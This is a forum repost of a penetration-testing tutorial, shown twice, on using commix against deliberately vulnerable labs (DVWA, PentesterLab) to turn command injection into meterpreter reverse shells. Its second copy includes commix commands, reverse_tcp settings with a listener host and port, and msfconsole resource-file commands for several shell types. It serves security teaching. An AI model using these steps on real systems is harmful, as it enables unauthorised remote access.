landon98
Internal Linking Guru
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Commix is an automated command injection tool. It lets you have a meterpreter session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers inorderto find vulnerabilities. In thisarticle, we will learn how to get a meterpreter session using commix. For the detailed guide on commix click here.
Requirements :
As you can see in the image below the environment of DVWA is vulnerable to command injection. Submit the local host request from DVWA.
Capture the previously submitted request through BurpSuite by simultaneously turning on the intercept as shown in the image below :
Once the cookies are capture, copy the whole cookie and paste it in a TXT file. Now, use the following command in order to exploit the vulnerability of Command injection in the DVWA environment :
here,
–r:refers to the path of request file which will load HTTP.
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
Now thatyouare in the pseudo terminal, type the following set of command in order to generate reverse shell :
After executingthe abovecommands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As our DWVA is setup on windows, we will select option 10. Then it will further ask you to choose a particular power shell injection. Choose 1 as of now as we will try other options too.
When everything is done, it will give a resource file with the execution command. Open a new terminal window and type the command there, as in our case it generated the following command :
As the above command is executed, you will directly have your meterpreter session as shown in the image above.
Now, repeat the above steps as they are but instead of choosing 1 option of power shell injectionto choose2 this time as it will help us get meterpreter session through magic unicorn. After choosing option 2, it will again generate a resource file that is to be executed in the new terminal window. In our casethe followingcommand was generated :
Again, when the command is executing you will have your meterpreter session as shown in the image below :
All the above meterpreter session were taken using option 10 under the category ofthe meterpreterreverse shell. But this time we will use option 11, which is web delivery, to have a meterpreter session. So, repeat the same steps as above but this time choose 11 option when asked for which meterpreter reverse shell you want.
Then once you have chosen option 11, it will ask whether you want web delivery script for PHP, Python or windows. Now, as we are attacking windows select option 3.
Once again, it will give you aresourcefile and a command that is to be run in the new terminal window. In our case,the followingcommand was generated :
As the command is executed, you will have your meterpreter session as shown in the image below :
Until now, all the meterpreter session we took were in theWindow’senvironment. Now, will be gain meterpreter session in Linux’s environment. For this, we will use PentesterLab.
Just like we did for windows, capture the cookies ofpentesterlabinburp suiteas shown in the image below :
Copy the contents of the cookies in a TXT file and use the following command to attack :
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :
After executingthe abovecommands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As we are now testing onLinux, we will select option 8 i.e. a PHP meterpreter reverse shell.
Just like before, this too will generate a resource file which you have to execute in a new terminal window. In our case, the command generated was :
As the above command is executed, you will haveyoursession as shown in the image below :
The other method we will use to exploitLinuxis by using web delivery. Repeat the above steps similarly,butinstead of choosing option 8, this time choose option 11 for web delivery. And then choose option 2 for a PHP reverse shell.
Executing the above steps will create a resource file yet again. Run the command given in the new terminal window :
Running the above command will giveyou yoursession as shown in the above image. This ishowyou can gain a meterpreter session through command injection vulnerability using commix. The session can be acquired in both Windows andLinuxplatforms.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
Requirements :
- DVWA (for Windows 10)
- PentesterLab (for Linux testing)
- Kali Linux
- Commix
As you can see in the image below the environment of DVWA is vulnerable to command injection. Submit the local host request from DVWA.
Capture the previously submitted request through BurpSuite by simultaneously turning on the intercept as shown in the image below :
Once the cookies are capture, copy the whole cookie and paste it in a TXT file. Now, use the following command in order to exploit the vulnerability of Command injection in the DVWA environment :
Code:
commix -r /root/Desktop/req.txthere,
–r:refers to the path of request file which will load HTTP.
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
Now thatyouare in the pseudo terminal, type the following set of command in order to generate reverse shell :
Code:
reverse_tcp
set lhost 192.168.1.107
set lport 1234After executingthe abovecommands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As our DWVA is setup on windows, we will select option 10. Then it will further ask you to choose a particular power shell injection. Choose 1 as of now as we will try other options too.
When everything is done, it will give a resource file with the execution command. Open a new terminal window and type the command there, as in our case it generated the following command :
Code:
msfconsole -r /usr/share/commix/powershell_attack.rcAs the above command is executed, you will directly have your meterpreter session as shown in the image above.
Now, repeat the above steps as they are but instead of choosing 1 option of power shell injectionto choose2 this time as it will help us get meterpreter session through magic unicorn. After choosing option 2, it will again generate a resource file that is to be executed in the new terminal window. In our casethe followingcommand was generated :
Code:
msfconsole -r /usr/share/magic-unicorn/unicorn.rcAgain, when the command is executing you will have your meterpreter session as shown in the image below :
All the above meterpreter session were taken using option 10 under the category ofthe meterpreterreverse shell. But this time we will use option 11, which is web delivery, to have a meterpreter session. So, repeat the same steps as above but this time choose 11 option when asked for which meterpreter reverse shell you want.
Then once you have chosen option 11, it will ask whether you want web delivery script for PHP, Python or windows. Now, as we are attacking windows select option 3.
Once again, it will give you aresourcefile and a command that is to be run in the new terminal window. In our case,the followingcommand was generated :
Code:
msfconsole -r /usr/share/commix/web_delivery.rcAs the command is executed, you will have your meterpreter session as shown in the image below :
Until now, all the meterpreter session we took were in theWindow’senvironment. Now, will be gain meterpreter session in Linux’s environment. For this, we will use PentesterLab.
Just like we did for windows, capture the cookies ofpentesterlabinburp suiteas shown in the image below :
Copy the contents of the cookies in a TXT file and use the following command to attack :
Code:
commix -r /root/Desktop/1.txtAs the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :
Code:
reverse_tcp
set lhost 192.168.1.107
set lport 1234After executingthe abovecommands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As we are now testing onLinux, we will select option 8 i.e. a PHP meterpreter reverse shell.
Just like before, this too will generate a resource file which you have to execute in a new terminal window. In our case, the command generated was :
Code:
msfconsole -r /usr/share/commix/php_meterpreter.rcAs the above command is executed, you will haveyoursession as shown in the image below :
The other method we will use to exploitLinuxis by using web delivery. Repeat the above steps similarly,butinstead of choosing option 8, this time choose option 11 for web delivery. And then choose option 2 for a PHP reverse shell.
Executing the above steps will create a resource file yet again. Run the command given in the new terminal window :
Code:
msfconsole -r /usr/share/commix/web_delivery.rcRunning the above command will giveyou yoursession as shown in the above image. This ishowyou can gain a meterpreter session through command injection vulnerability using commix. The session can be acquired in both Windows andLinuxplatforms.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here